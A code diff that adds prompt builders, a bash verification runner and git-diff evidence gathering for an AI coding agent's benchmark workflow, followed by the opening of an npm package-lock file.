+${renderGateGuidance(STEP_GATES)}
+
+And write the summary the following steps in this phase will read: what was actually accomplished, in one or two sentences.`
+}
+
+/**
+ * kimchi's refusal text when a completion turn self-flags, ported from `gate-validation.ts`'s
+ * `flagLines` plus each turn's `renderFlagError`.
+ *
+ * The wording matters more than it looks. kimchi's voter is the ORCHESTRATOR — the agent that did the
+ * work and wants to advance — so "agent self-flagged" is literal, and the message tells it the two ways
+ * out: fix the underlying issue, or vote `omitted` when the gate genuinely does not apply. Sending this
+ * back into the SAME session (the step turn is `resumable` on the orchestrator's key) is what makes the
+ * re-call kimchi's: an agent reconsidering its own verdict on its own work, with the tools to act on it.
+ *
+ * What it refuses is ALSO exact, and this port used to get it wrong: kimchi refuses ONE tool call — "the
+ * agent has to fix the underlying issue and re-call" (tools/steps.ts:427) — not the work behind it. The
+ * only thing that runs again is this turn.
+ *
+ * `recall` is the one substitution the medium forces: kimchi says "re-call complete_ferment_step", and
+ * there is no tool here to re-call. The caller names the equivalent act ("complete the step again").
+ */
+export function gateRefusalText(args: {
+	what: string
+	flags: readonly { id: string; rationale: string; evidence: string }[]
+	recall: string
+}): string {
+	const { what, flags, recall } = args
+	const flagLines = flags
+		.map((flag) => `  ⛔ Gate ${flag.id}: ${flag.rationale}\n     evidence: ${flag.evidence}`)
+		.join("\n")
+	return [
+		`${what} cannot complete - agent self-flagged on ${flags.length} step gate(s):`,
+		"",
+		flagLines,
+		"",
+		`Resolve the underlying issue and ${recall} with verdicts of 'pass' (or 'omitted' with rationale if a gate truly does not apply).`,
+	].join("\n")
+}
+
+/** kimchi's `complete_ferment_phase` description + the phase-scope gate guidance. */
+export function phaseGatesPrompt(args: {
+	plan: Plan | undefined
+	phaseIndex: number
+	phaseCount: number
+	phase: { name: string; goal: string }
+	steps: readonly { index: number; description: string; summary: string; verdicts: string; verified: string }[]
+}): string {
+	const { plan, phaseIndex, phaseCount, phase, steps } = args
+	return [
+		`Phase ${phaseIndex}/${phaseCount} "${phase.name}" has finished its steps. Decide whether it may be marked completed.`,
+		"",
+		`Ferment: ${plan?.title ?? "(untitled)"}`,
+		`Goal: ${plan?.goal ?? "(none specified)"}`,
+		plan?.success_criteria?.length ? `Success criteria: ${plan.success_criteria.join("; ")}` : "",
+		`Phase goal: ${phase.goal}`,
+		"",
+		"What its steps did:",
+		...steps.map(
+			(step) =>
+				`  ${step.index}. "${step.description}"\n     summary: ${step.summary}\n     step gates: ${step.verdicts}\n     verification: ${step.verified}`,
+		),
+		"",
+		"The machine is not in your context — read it where the record above is thin. Do not fix anything.",
+		"",
+		'You must produce verdicts for the three phase-scope gates below. A "flag" verdict refuses advancement.',
+		"",
+		renderGateGuidance(PHASE_GATES),
+	]
+		.filter((line) => line !== "")
+		.join("\n")
+}
+
+/** kimchi's `complete_ferment` description + the ferment-scope gate guidance. */
+export function shipPrompt(args: {
+	intent: string
+	plan: Plan | undefined
+	phases: readonly { index: number; name: string; summary: string; verdicts: string }[]
+}): string {
+	const { intent, plan, phases } = args
+	return [
+		"All phases of this ferment are terminal. Decide whether it ships.",
+		"",
+		`User intent: "${intent}"`,
+		`Ferment: ${plan?.title ?? "(untitled)"}`,
+		`Goal: ${plan?.goal ?? "(none specified)"}`,
+		plan?.success_criteria?.length
+			? `Success criteria (the P3 checklist):\n${plan.success_criteria.map((criterion) => `  - ${criterion}`).join("\n")}`
+			: "",
+		"",
+		"What each phase reported:",
+		...phases.map(
+			(phase) => `  ${phase.index}. ${phase.name}\n     summary: ${phase.summary}\n     phase gates: ${phase.verdicts}`,
+		),
+		"",
+		"The machine is not in your context — C1 and C3 both ask for evidence, so go and look. Do not fix anything.",
+		"",
+		'You must produce verdicts for the three ferment-scope gates below. A "flag" verdict refuses ship.',
+		"",
+		renderGateGuidance(SHIP_GATES),
+	]
+		.filter((line) => line !== "")
+		.join("\n")
+}
+
+/**
+ * The phase grader, ported from kimchi's `buildPhaseGraderPrompt`.
+ *
+ * kimchi spawns this one as a SUBAGENT with tools ("Verify the agent's claims independently using your
+ * tools"), unlike its other two judges — so a background agent step is the faithful rendering here, not
+ * a concession. Its grade drives advancement: A/B advance, C/D/F refuse.
+ */
+export function phaseGraderPrompt(args: {
+	plan: Plan | undefined
+	phase: { name: string; goal: string }
+	phaseSummary: string
+	stepSummaries: string
+	gateVerdicts: readonly { id: string; verdict: string; rationale: string }[]
+	diff: DiffEvidence
+	cwd: string
+}): string {
+	const { plan, phase, phaseSummary, stepSummaries, gateVerdicts, diff, cwd } = args
+	const parts: string[] = []
+	parts.push("You are grading a completed phase of an autonomous coding ferment.")
+	parts.push("Verify the agent's claims independently using your tools, then produce a grade as JSON.")
+	parts.push("")
+	parts.push(`Ferment: "${plan?.title ?? "(untitled)"}"`)
+	parts.push(`Phase: "${phase.name}"`)
+	parts.push(`Phase goal: ${phase.goal || "(none specified)"}`)
+	parts.push(`Phase summary: ${phaseSummary || "(none)"}`)
+	if (stepSummaries.trim().length > 0) {
+		parts.push("")
+		parts.push("Step summaries:")
+		parts.push(stepSummaries)
+	}
+	parts.push("")
+	parts.push("Phase-scope gate verdicts (agent self-reported — verify independently):")
+	for (const verdict of gateVerdicts) parts.push(`  ${verdict.id} (${verdict.verdict}): ${verdict.rationale}`)
+	if (diff.available) {
+		parts.push("")
+		parts.push("--- PHASE DIFF ---")
+		parts.push(`Files changed:\n${diff.filesChanged || "(none recorded)"}`)
+		if (diff.diffSnippet) parts.push(`\nDiff snippet:\n\`\`\`diff\n${diff.diffSnippet}\n\`\`\``)
+		// A byte cap read as an absence of work is a phase refused for the wrong reason, so the snippet says
+		// how much of itself is missing. The grader has tools and is told to verify independently; this tells
+		// it where it must.
+		if (diff.elidedBytes > 0) {
+			parts.push(
+				`\n(This snippet is truncated: ${diff.elidedBytes} bytes were elided from the middle. Work you cannot see here may still exist — check it rather than grading it absent.)`,
+			)
+		}
+	} else {
+		parts.push("")
+		parts.push("(No diff available — use your tools to inspect files directly.)")
+	}
+	parts.push("")
+	parts.push(`Working directory: ${cwd}`)
+	return parts.join("\n")
+}
+
+/**
+ * What kimchi tells the agent when the grader refuses the phase: the recommendations, and to address
+ * them before completing the phase again. In kimchi this arrives as a tool error to the planner, which
+ * then dispatches the rework; here it is the rework worker's own prompt.
+ */
+export function phaseReworkPrompt(args: {
+	plan: Plan | undefined
+	phase: { name: string; goal: string }
+	grade: PhaseGrade | undefined
+	flags: readonly { id: string; rationale: string; evidence: string }[]
+	minimum: string
+	retry: number
+	maxRetries: number
+}): string {
+	const { plan, phase, grade, flags, minimum, retry, maxRetries } = args
+
+	// A phase is refused for either reason, and kimchi checks them in this order: a flagged F gate feeds
+	// the retry pipeline before the grader is ever consulted, so a flagged phase has no grade to report.
+	if (flags.length > 0) {
+		return [
+			gateRefusalText({ what: `Phase "${phase.name}"`, flags, recall: "complete the phase again" }),
+			"",
+			`Ferment: ${plan?.title ?? "(untitled)"}`,
+			`Phase goal: ${phase.goal}`,
+			`Retry ${retry}/${maxRetries}.`,
+			"",
+			"Change the machine so the flagged gates hold — the phase is judged again on what it finds.",
+		].join("\n")
+	}
+
+	return [
+		`**Phase "${phase.name}"** cannot complete — the grader assigned grade ${grade?.grade ?? "?"}, minimum required is ${minimum} (retry ${retry}/${maxRetries}).`,
+		"",
+		`Ferment: ${plan?.title ?? "(untitled)"}`,
+		`Phase goal: ${phase.goal}`,
+		`Grader's rationale: ${grade?.rationale ?? "(none)"}`,
+		"",
+		"Recommendations:",
+		...(grade?.recommendations ?? []).map((rec, index) => `  ${index + 1}. ${rec}`),
+		"",
+		"Address the recommendations above. Change the machine — the phase is graded again on what it finds,",
+		"not on what you say you did.",
+	].join("\n")
+}
+
+/** Verbatim from kimchi's `STEP_VERIFICATION_SYSTEM`, plus its user message (`judgeStepVerification`). */
+export function verifyTriagePrompt(args: {
+	step: PlannedStep
+	command: string
+	exitCode: number
+	stdout: string
+	stderr: string
+}): string {
+	const { step, command, exitCode, stdout, stderr } = args
+	return `You are a strict verification triage judge. A step's verification command exited non-zero. You will decide:
+- "pass":  the non-zero exit is benign (grep matched nothing as expected, linter warnings only, etc.). The work is acceptable.
+- "retry": the failure looks transient (network blip, race, missing setup file that should exist next try).
+- "fail":  the failure is a real implementation defect that must be fixed.
+
+Be skeptical. When in doubt between pass/retry/fail, prefer "fail" — false-pass is the worst outcome.
+
+Judge from the output below and nothing else. In kimchi this triage is a single model call with no tools, so do not re-run the command or inspect the machine — classify what you are shown.
+
+Step: "${step.description}"
+Verification: \`${command}\`
+Exit: ${exitCode}
+stdout:
+${stdout.slice(0, 1200)}
+stderr:
+${stderr.slice(0, 1200)}`
+}
+
+/** kimchi truncates judge inputs at 1200 chars; the same cap applies to what a retry is shown. */
+function clip(text: string, max = 1200): string {
+	return text.length > max ? `${text.slice(0, max)}…` : text
+}

--- a/benchmark/terminal-bench-2/workflows/ferment/verify.ts
+++ b/benchmark/terminal-bench-2/workflows/ferment/verify.ts
@@ -1,0 +1,228 @@
+/**
+ * Two things this workflow runs itself rather than asking an agent to run: a step's verification
+ * command, and the diff its phase grader is shown.
+ *
+ * Running a step's verification command, as kimchi's `verify_ferment_step` does.
+ *
+ * kimchi executes the command through the harness's own `bash` tool with a 60s timeout and records
+ * `{exitCode, stdout, stderr}` on the step. There is no tool loop here, so this runs it directly — same
+ * shell, same timeout, same recorded shape. It is a FUNCTION step's body, deliberately: the command is
+ * the plan's own, and handing it to an agent to run would let the agent decide what it saw.
+ */
+import { spawn } from "node:child_process"
+import type { VerifyResult } from "./contract.ts"
+
+/** kimchi's `VERIFY_TIMEOUT_MS`. */
+export const VERIFY_TIMEOUT_MS = 60_000
+
+const MAX_CAPTURE = 64_000
+
+/**
+ * What a diff command may return before this function starts dropping bytes of its own.
+ *
+ * It has to be well above the diff caps below, or the CAPTURE becomes the truncator: a diff over 64KB
+ * would arrive already cut at the head, `capBytes` would keep the "tail" of the cut, and the reader would
+ * be told a byte count that was not the real one. The evidence says how much it dropped, so it must be
+ * the thing that dropped it.
+ */
+const MAX_DIFF_CAPTURE = 2_000_000
+
+export async function runVerification(
+	command: string,
+	signal: AbortSignal,
+	maxCapture = MAX_CAPTURE,
+): Promise<VerifyResult> {
+	return new Promise<VerifyResult>((resolve) => {
+		let stdout = ""
+		let stderr = ""
+		let settled = false
+
+		const finish = (exitCode: number, extraStderr = ""): void => {
+			if (settled) return
+			settled = true
+			clearTimeout(timer)
+			signal.removeEventListener("abort", onAbort)
+			resolve({
+				ran: true,
+				command,
+				exitCode,
+				stdout: stdout.slice(0, maxCapture),
+				stderr: `${stderr}${extraStderr}`.slice(0, maxCapture),
+			})
+		}
+
+		// `bash -lc` so the command sees a login shell's PATH — the same assumption every verify command in
+		// a terminal-bench container is written against.
+		const child = spawn("bash", ["-lc", command], { stdio: ["ignore", "pipe", "pipe"] })
+		child.stdout?.on("data", (chunk: Buffer) => {
+			if (stdout.length < maxCapture) stdout += chunk.toString()
+		})
+		child.stderr?.on("data", (chunk: Buffer) => {
+			if (stderr.length < maxCapture) stderr += chunk.toString()
+		})
+
+		const kill = (): void => {
+			child.kill("SIGKILL")
+		}
+		const timer = setTimeout(() => {
+			kill()
+			finish(1, "\nVerification command timed out after 60s")
+		}, VERIFY_TIMEOUT_MS)
+		const onAbort = (): void => {
+			kill()
+			finish(1, "\nVerification command was cancelled")
+		}
+		signal.addEventListener("abort", onAbort, { once: true })
+
+		child.on("error", (error: Error) => finish(1, `\nbash execution threw an exception: ${error.message}`))
+		child.on("close", (code: number | null) => finish(code ?? 1))
+	})
+}
+
+// -- Diff evidence ------------------------------------------------------------------------------------
+//
+// kimchi captures a git ref at `activate_ferment_phase` (`setPhaseStartRef`) and turns the range into
+// evidence at `complete_ferment_phase` (`phase-evidence.ts`), so the phase grader sees what actually
+// changed instead of only what the agent says changed. Same idea, same caps.
+//
+// ONE range, the phase's, and that is kimchi's line too. A version of this file also gathered a
+// step-scope diff and pasted it into the step's gate turn, because that turn was a cold reviewer that had
+// not seen the work and went and re-derived it — 92.4 min of gate turns over one 6-task run, against
+// 23 min if each had cost its own task's fastest. The reviewer is gone: the step turn now DOES the work,
+// so it holds the edits it made, and what it is handed instead is the one thing kimchi hands its
+// orchestrator — the step's start ref. kimchi keeps `stepStartRefs` "(phaseId:stepId → sha) captured at
+// start_ferment_step, consumed at complete_ferment_step for diff evidence" (runtime-state-store.ts:11)
+// and surfaces the SHA in derived state (derive-state.ts:150). It never assembles a step diff for anyone.
+//
+// Untracked files ARE part of the phase evidence, and this port had dropped them. kimchi lists them
+// (`git ls-files --others --exclude-standard`) and synthesises a diff against /dev/null for each, so a
+// step that CREATED a file shows up as work. Without it F2's "cite the specific artifact" and the
+// grader's independent check both read a phase of new files as a phase that changed nothing — handing a
+// reader a diff that omits new files is worse than handing it none.
+
+/** kimchi's `MAX_FILES_LISTED` (src/extensions/ferment/phase-evidence.ts). */
+const MAX_FILES_LISTED = 20
+
+/** kimchi's `MAX_DIFF_BYTES`: what the phase grader is shown. */
+const MAX_PHASE_DIFF_BYTES = 4000
+
+/** How many untracked files are diffed into the evidence — bounds the spawns, not just the bytes. */
+const MAX_UNTRACKED_DIFFED = 20
+
+export interface DiffEvidence {
+	available: boolean
+	filesChanged: string
+	diffSnippet: string
+	/**
+	 * Bytes dropped from the middle of `diffSnippet`, 0 when it is whole.
+	 *
+	 * Carried as a number rather than left implicit in the snippet's own marker because the reader has to
+	 * be TOLD it is reading a truncation: a grader that reads "not in the diff" as "not done" turns a byte
+	 * cap into a refusal, and the prompt says so explicitly when this is non-zero.
+	 */
+	elidedBytes: number
+}
+
+const NO_DIFF: DiffEvidence = { available: false, filesChanged: "", diffSnippet: "", elidedBytes: 0 }
+
+/** The commit a phase or step starts from, or `""` outside a git repo — evidence is best-effort, never fatal. */
+export async function currentGitRef(signal: AbortSignal): Promise<string> {
+	const result = await runVerification("git rev-parse HEAD", signal)
+	return result.exitCode === 0 ? result.stdout.trim() : ""
+}
+
+/** What changed since `sinceRef`, as the phase grader is shown it. */
+export async function phaseDiffSince(sinceRef: string, signal: AbortSignal): Promise<DiffEvidence> {
+	return diffSince(sinceRef, signal, MAX_PHASE_DIFF_BYTES)
+}
+
+async function diffSince(sinceRef: string, signal: AbortSignal, maxDiffBytes: number): Promise<DiffEvidence> {
+	if (!sinceRef) return NO_DIFF
+
+	const stat = await runVerification(`git diff --stat ${sinceRef}`, signal, MAX_DIFF_CAPTURE)
+	if (stat.exitCode !== 0) return NO_DIFF
+
+	const untracked = await untrackedFiles(signal)
+	const tracked = await runVerification(`git diff --unified=2 ${sinceRef}`, signal, MAX_DIFF_CAPTURE)
+
+	// kimchi's ordering: tracked changes first, then the synthetic untracked diffs, bounded so a directory
+	// full of new files cannot crowd out the edits the grader is actually ruling on.
+	const parts: string[] = []
+	if (tracked.exitCode === 0 && tracked.stdout.trim().length > 0) parts.push(tracked.stdout)
+	let untrackedBytes = 0
+	for (const file of untracked.slice(0, MAX_UNTRACKED_DIFFED)) {
+		if (untrackedBytes >= maxDiffBytes) break
+		const synthetic = await diffUntrackedFile(file, signal)
+		if (synthetic.length === 0) continue
+		parts.push(synthetic)
+		untrackedBytes += synthetic.length
+	}
+
+	const capped = capBytes(parts.join("\n"), maxDiffBytes)
+	return {
+		available: true,
+		filesChanged: fileList(stat.stdout.trim(), untracked) || "(no changes)",
+		diffSnippet: capped.diffSnippet,
+		elidedBytes: capped.elidedBytes,
+	}
+}
+
+/**
+ * The files git knows nothing about yet — kimchi's `gatherUntrackedFiles`, `--exclude-standard` and all,
+ * so a .gitignore'd build directory stays out of the evidence.
+ */
+async function untrackedFiles(signal: AbortSignal): Promise<string[]> {
+	const result = await runVerification("git ls-files --others --exclude-standard", signal, MAX_DIFF_CAPTURE)
+	if (result.exitCode !== 0) return []
+	return result.stdout
+		.split("\n")
+		.map((line) => line.trim())
+		.filter((line) => line.length > 0)
+}
+
+/**
+ * A new file as a diff against /dev/null, so its content reads as added lines — kimchi's
+ * `diffUntrackedFile`. `git diff --no-index` exits 1 when it finds differences, which is the expected
+ * case here, so anything up to exit 1 is a usable answer.
+ */
+async function diffUntrackedFile(file: string, signal: AbortSignal): Promise<string> {
+	const result = await runVerification(
+		`git diff --no-index --unified=2 /dev/null ${shellQuote(file)}`,
+		signal,
+		MAX_DIFF_CAPTURE,
+	)
+	return result.exitCode <= 1 ? result.stdout : ""
+}
+
+/** A path goes through `bash -lc`, so it is quoted rather than trusted — kimchi avoids this with an argv spawn. */
+function shellQuote(path: string): string {
+	return `'${path.replaceAll("'", `'\\''`)}'`
+}
+
+/** The `--stat` block plus kimchi's `?? path` lines for untracked files, each capped on its own. */
+function fileList(stat: string, untracked: readonly string[]): string {
+	const tracked = stat.length > 0 ? capLines(stat) : ""
+	if (untracked.length === 0) return tracked
+	const listed = untracked.slice(0, MAX_FILES_LISTED).map((file) => `?? ${file}`)
+	const rest =
+		untracked.length > MAX_FILES_LISTED ? `\n[... ${untracked.length - MAX_FILES_LISTED} more untracked files ...]` : ""
+	const block = `${listed.join("\n")}${rest}`
+	return tracked ? `${tracked}\n${block}` : block
+}
+
+function capLines(text: string): string {
+	const lines = text.split("\n")
+	if (lines.length <= MAX_FILES_LISTED + 1) return text
+	return `${lines.slice(0, MAX_FILES_LISTED).join("\n")}\n[... ${lines.length - MAX_FILES_LISTED} more ...]`
+}
+
+/** kimchi keeps the head and the tail of an oversized diff, not just the head. */
+function capBytes(diff: string, maxDiffBytes: number): { diffSnippet: string; elidedBytes: number } {
+	if (diff.length <= maxDiffBytes) return { diffSnippet: diff, elidedBytes: 0 }
+	const half = Math.floor(maxDiffBytes / 2)
+	const elidedBytes = diff.length - maxDiffBytes
+	return {
+		diffSnippet: `${diff.slice(0, half)}\n\n[... diff truncated, ${elidedBytes} bytes elided ...]\n\n${diff.slice(-half)}`,
+		elidedBytes,
+	}
+}

--- a/benchmark/terminal-bench-2/workflows/package-lock.json
+++ b/benchmark/terminal-bench-2/workflows/package-lock.json
@@ -1,0 +1,3833 @@
+{
+	"name": "@kimchi-dev/terminal-bench-workflows",
+	"version": "0.0.0",
+	"lockfileVersion": 3,
+	"requires": true,
+	"packages": {
+		"": {
+			"name": "@kimchi-dev/terminal-bench-workflows",
+			"version": "0.0.0",
+			"devDependencies": {
+				"@kimchi-dev/kimchi-workflows": "0.0.1-alpha.1",
+				"@types/node": "^22.10.0",
+				"typebox": "1.1.38",
+				"typescript": "^7.0.2",
+				"vitest": "^4.1.10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent": {
+			"version": "0.82.1",
+			"resolved": "https://registry.npmjs.org/@earendil-works/pi-coding-agent/-/pi-coding-agent-0.82.1.tgz",
+			"integrity": "sha512-zbkAhoIuDPMF3pKuja0ajZabrMWU29FUMV9A/XMXT/XC1yXs5xt6t6t13GogQFsDrDqbFP4DkZQO1w8rWRAzYA==",
+			"dev": true,
+			"hasShrinkwrap": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"@earendil-works/pi-agent-core": "^0.82.1",
+				"@earendil-works/pi-ai": "^0.82.1",
+				"@earendil-works/pi-tui": "^0.82.1",
+				"@silvia-odwyer/photon-node": "0.3.4",
+				"chalk": "5.6.2",
+				"cross-spawn": "7.0.6",
+				"diff": "8.0.4",
+				"glob": "13.0.6",
+				"highlight.js": "10.7.3",
+				"hosted-git-info": "9.0.3",
+				"ignore": "7.0.5",
+				"jiti": "2.7.0",
+				"minimatch": "10.2.5",
+				"proper-lockfile": "4.1.2",
+				"semver": "7.8.0",
+				"typebox": "1.1.38",
+				"undici": "8.5.0",
+				"yaml": "2.9.0"
+			},
+			"bin": {
+				"pi": "dist/cli.js"
+			},
+			"engines": {
+				"node": ">=22.19.0"
+			},
+			"optionalDependencies": {
+				"@mariozechner/clipboard": "0.3.9"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@anthropic-ai/sdk": {
+			"version": "0.91.1",
+			"resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.91.1.tgz",
+			"integrity": "sha512-LAmu761tSN9r66ixvmciswUj/ZC+1Q4iAfpedTfSVLeswRwnY3n2Nb6Tsk+cLPP28aLOPWeMgIuTuCcMC6W/iw==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"json-schema-to-ts": "^3.1.1"
+			},
+			"bin": {
+				"anthropic-ai-sdk": "bin/cli"
+			},
+			"peerDependencies": {
+				"zod": "^3.25.0 || ^4.0.0"
+			},
+			"peerDependenciesMeta": {
+				"zod": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-crypto/crc32": {
+			"version": "5.2.0",
+			"resolved": "https://registry.npmjs.org/@aws-crypto/crc32/-/crc32-5.2.0.tgz",
+			"integrity": "sha512-nLbCWqQNgUiwwtFsen1AdzAtvuLRsQS8rYgMuxCrdKf9kOssamGLuPwyTY9wyYblNr9+1XM8v6zoDTPPSIeANg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-crypto/util": "^5.2.0",
+				"@aws-sdk/types": "^3.222.0",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=16.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-crypto/sha256-browser": {
+			"version": "5.2.0",
+			"resolved": "https://registry.npmjs.org/@aws-crypto/sha256-browser/-/sha256-browser-5.2.0.tgz",
+			"integrity": "sha512-AXfN/lGotSQwu6HNcEsIASo7kWXZ5HYWvfOmSNKDsEqC4OashTp8alTmaz+F7TC2L083SFv5RdB+qU3Vs1kZqw==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-crypto/sha256-js": "^5.2.0",
+				"@aws-crypto/supports-web-crypto": "^5.2.0",
+				"@aws-crypto/util": "^5.2.0",
+				"@aws-sdk/types": "^3.222.0",
+				"@aws-sdk/util-locate-window": "^3.0.0",
+				"@smithy/util-utf8": "^2.0.0",
+				"tslib": "^2.6.2"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-crypto/sha256-js": {
+			"version": "5.2.0",
+			"resolved": "https://registry.npmjs.org/@aws-crypto/sha256-js/-/sha256-js-5.2.0.tgz",
+			"integrity": "sha512-FFQQyu7edu4ufvIZ+OadFpHHOt+eSTBaYaki44c+akjg7qZg9oOQeLlk77F6tSYqjDAFClrHJk9tMf0HdVyOvA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-crypto/util": "^5.2.0",
+				"@aws-sdk/types": "^3.222.0",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=16.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-crypto/supports-web-crypto": {
+			"version": "5.2.0",
+			"resolved": "https://registry.npmjs.org/@aws-crypto/supports-web-crypto/-/supports-web-crypto-5.2.0.tgz",
+			"integrity": "sha512-iAvUotm021kM33eCdNfwIN//F77/IADDSs58i+MDaOqFrVjZo9bAal0NK7HurRuWLLpF1iLX7gbWrjHjeo+YFg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"tslib": "^2.6.2"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-crypto/util": {
+			"version": "5.2.0",
+			"resolved": "https://registry.npmjs.org/@aws-crypto/util/-/util-5.2.0.tgz",
+			"integrity": "sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/types": "^3.222.0",
+				"@smithy/util-utf8": "^2.0.0",
+				"tslib": "^2.6.2"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/client-bedrock-runtime": {
+			"version": "3.1048.0",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/client-bedrock-runtime/-/client-bedrock-runtime-3.1048.0.tgz",
+			"integrity": "sha512-u+NT61JZEkRFtpL0CAw1N1dwxnaLgwVXQl/zjJxTGgLyS/jTIdg2SdoEoCTHxgDyCnqa1HEi9QOoE9/pYRNpOQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-crypto/sha256-browser": "5.2.0",
+				"@aws-crypto/sha256-js": "5.2.0",
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/credential-provider-node": "^3.972.42",
+				"@aws-sdk/eventstream-handler-node": "^3.972.16",
+				"@aws-sdk/middleware-eventstream": "^3.972.12",
+				"@aws-sdk/middleware-websocket": "^3.972.19",
+				"@aws-sdk/token-providers": "3.1048.0",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/fetch-http-handler": "^5.4.2",
+				"@smithy/node-http-handler": "^4.7.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/core": {
+			"version": "3.974.11",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/core/-/core-3.974.11.tgz",
+			"integrity": "sha512-QpnINq5FZH6EOaDEkmHdT7eUunbvD27pDNQypaWjFyYz7Zl1q3UCMQErBZxpmfGfI7MvI2TlK8KTkgNpv8b1ug==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/types": "^3.973.8",
+				"@aws-sdk/xml-builder": "^3.972.24",
+				"@aws/lambda-invoke-store": "^0.2.2",
+				"@smithy/core": "^3.24.2",
+				"@smithy/signature-v4": "^5.4.2",
+				"@smithy/types": "^4.14.1",
+				"bowser": "^2.11.0",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-env": {
+			"version": "3.972.37",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.972.37.tgz",
+			"integrity": "sha512-/jpPvEh6f7ntmIzf7dNxoNX6Q8vt8UpesCjbW6mFfk4V1NW6bIy9qxcQ6WbA8As5yQhsZOe+xeNd4xHX8kdY2Q==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-http": {
+			"version": "3.972.39",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-http/-/credential-provider-http-3.972.39.tgz",
+			"integrity": "sha512-pIgTpisWyWg7X1bUbzSjuUYosYTD0Ghz2M0hkSTmb3a6i3qV3uU+NYJPI/E2XSC0HcsZh5rsLPzeXrkb2DS0Cg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/fetch-http-handler": "^5.4.2",
+				"@smithy/node-http-handler": "^4.7.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-ini": {
+			"version": "3.972.41",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.972.41.tgz",
+			"integrity": "sha512-u2tyjaxJJzW8UtW4SM1ZcPMDwO6y+kV+llvou+Adts0FAKyzes5jG4izQN+KX3yE8ZROpS5y1LJ//xL2iSf76w==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/credential-provider-env": "^3.972.37",
+				"@aws-sdk/credential-provider-http": "^3.972.39",
+				"@aws-sdk/credential-provider-login": "^3.972.41",
+				"@aws-sdk/credential-provider-process": "^3.972.37",
+				"@aws-sdk/credential-provider-sso": "^3.972.41",
+				"@aws-sdk/credential-provider-web-identity": "^3.972.41",
+				"@aws-sdk/nested-clients": "^3.997.9",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/credential-provider-imds": "^4.3.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-login": {
+			"version": "3.972.41",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-login/-/credential-provider-login-3.972.41.tgz",
+			"integrity": "sha512-0LBitxXiAiaE5nlFPfpNIww/8FRY/I7WIndWsc9GmNFOM7cE1wNpVNQEGEk9Outg5l8xl+3vybxFyUy4l9q/LQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/nested-clients": "^3.997.9",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
